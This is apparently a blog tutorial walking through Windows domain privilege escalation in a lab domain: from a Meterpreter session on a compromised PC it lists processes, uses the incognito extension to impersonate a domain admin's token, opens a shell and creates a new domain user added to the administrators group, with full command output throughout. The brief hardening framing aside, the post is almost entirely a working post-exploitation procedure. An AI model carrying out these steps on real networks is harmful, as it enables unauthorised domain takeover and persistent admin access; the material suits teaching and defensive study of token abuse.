Create a domain user admin through an exploited PC

The server and pc hardening is the process of securing a system, limiting the surface that can be attacked. One of its role is to limitate the use of amministrative right.
Nowadays users have to use an unprivileged accounts, also sysadmins have to remind this role when configuring service and scripts.
Sometimes, to let centralized software to work correctly, sysadmins install client agents to work with high privileged account and this can be used to scalate privileges.
This is how to create a domain user admin through an exploited domain PC with local machine administration rights.

The domain is called LAB.local based on Windows 2008R2. LABServer07 is the primary DC.
The exploited machine is joined to the domain and we got a Meterpreter shell with local PC admin rights.

Basic command used after exploit:
Find process –> meterpreter > ps
Load incognito extension –> meterpreter > use incognito
Listing available tokens –> meterpreter > list_tokens -u
Impersonate token –> meterpreter > impersonate_token
Get a command shell using the token –> meterpreter > execute -f cmd.exe -i -t -H -c
Add a domain User –> C:\WINDOWS\system32>net user USER PASSWORD /add /domain
Add the creted user in domain admin –> C:\WINDOWS\system32>net localgroup administrators USER /add /domain

Interact with session 1 and list process:

msf exploit(psexec) > sessions -i 1[*] Starting interaction with 1...

meterpreter > ps

Process list
============

 PID   Name              Arch  Session  User                           Path
 ---   ----              ----  -------  ----                           ----
 0     [System Process]
 4     System            x86   0        NT AUTHORITY\SYSTEM
 1736  smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 1788  csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 1812  winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 1856  services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 1868  lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 2032  ibmpmsvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\ibmpmsvc.exe
 176   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 312   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 404   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 508   EvtEng.exe        x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\EvtEng.exe
 604   S24EvMon.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\S24EvMon.exe
 824   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\svchost.exe
 848   svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1228  spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1304  svchost.exe       x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\system32\svchost.exe
 1344  AcPrfMgrSvc.exe   x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
 1416  btwdins.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\Bluetooth Software\bin\btwdins.exe
 1484  RegSrvc.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Intel\Wireless\Bin\RegSrvc.exe
 1676  TpKmpSvc.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\TpKmpSVC.exe
 180   AcSvc.exe         x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\AcSvc.exe
 700   MOMService.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\Microsoft Forefront\Client Security\Client\Microsoft Operations Manager 2005\MOMService.exe
 224   wmiprvse.exe      x86   0        NT AUTHORITY\SERVIZIO DI RETE  C:\WINDOWS\system32\wbem\wmiprvse.exe
 948   SvcGuiHlpr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Programmi\ThinkPad\ConnectUtilities\SvcGuiHlpr.exe
 2580  alg.exe           x86   0        NT AUTHORITY\SERVIZIO LOCALE   C:\WINDOWS\System32\alg.exe
 3276  explorer.exe      x86   0        LAB\utente1                    C:\WINDOWS\Explorer.EXE
 3908  tp4mon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\tp4mon.exe
 1112  igfxtray.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxtray.exe
 1124  hkcmd.exe         x86   0        LAB\utente1                    C:\WINDOWS\system32\hkcmd.exe
 2192  igfxpers.exe      x86   0        LAB\utente1                    C:\WINDOWS\system32\igfxpers.exe
 1860  ACTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACTray.exe
 2596  ACWLIcon.exe      x86   0        LAB\utente1                    C:\Programmi\ThinkPad\ConnectUtilities\ACWLIcon.exe
 2700  smax4pnp.exe      x86   0        LAB\utente1                    C:\Programmi\Analog Devices\Core\smax4pnp.exe
 2904  ctfmon.exe        x86   0        LAB\utente1                    C:\WINDOWS\system32\ctfmon.exe
 3076  BTTray.exe        x86   0        LAB\utente1                    C:\Programmi\ThinkPad\Bluetooth Software\BTTray.exe
 3572  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 2912  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 1472  rundll32.exe      x86   0        LAB\admin                 C:\WINDOWS\system32\rundll32.exe                           <---------- Look at these
 1256  cmd.exe           x86   0        LAB\admin                 C:\WINDOWS\system32\cmd.exe                                <---------- Look at these
 3044  msiexec.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\msiexec.exe
 3224  rundll32.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\rundll32.exe

Load extension, list token and impersonate domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
LAB\admin
LAB\utente1
NT AUTHORITY\SERVIZIO DI RETE
NT AUTHORITY\SERVIZIO LOCALE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ACCESSO ANONIMO

meterpreter > impersonate_token lab\\admin          <---------- Double backslash DOMAIN\\name
[+] Delegation token available
[+] Successfully impersonated user LAB\admin

meterpreter > getuid
Server username: lab\admin

Get a domain admin shell:

meterpreter > execute -f cmd.exe -i -t -H -c
Process 3804 created.
Channel 1 created.
Microsoft Windows XP [Versione 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


C:\WINDOWS\system32>

Create new domain user and join to the domain admins group:

C:\WINDOWS\system32>net user TestUser Passw0rd /add /domain
net user TestUser Passw0rd /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.


C:\WINDOWS\system32>net localgroup /domain
net localgroup /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.


Alias per \\LABServer07.lab.local

-------------------------------------------------------------------------------
*Accesso compatibile precedente a Windows 2000
*Accesso DCOM a Servizi certificati
*Account Operators
*Administrators
*Backup Operators
*Cert Publishers
*Cryptographic Operators
*Distributed COM Users
*DnsAdmins
*Gruppo di accesso autorizzazione Windows
*Guests
*IIS_IUSRS
*Incoming Forest Trust Builders
*Lettori registri eventi
*Network Configuration Operators
*Ogg. autorizzati a replica passw. in controller sola lettura
*Ogg. non autoriz. a replica passw. in controller sola lettura
*Performance Log Users
*Performance Monitor Users
*Print Operators
*Replicator
*Server licenze di Terminal Server
*Server Operators
*Server RAS e IAS
*Users
*Utenti desktop remoto
Esecuzione comando riuscita.

C:\WINDOWS\system32>net localgroup administrators TestUser /add /domain
net localgroup administrators TestUser /add /domain
La richiesta verrà elaborata dal controller di dominio per il dominio lab.local.

Esecuzione comando riuscita.

Obviously the victim PC is an Italian version, “esecuzione comando riuscita” means “Command completed successfully”

Leave a Reply

Your email address will not be published.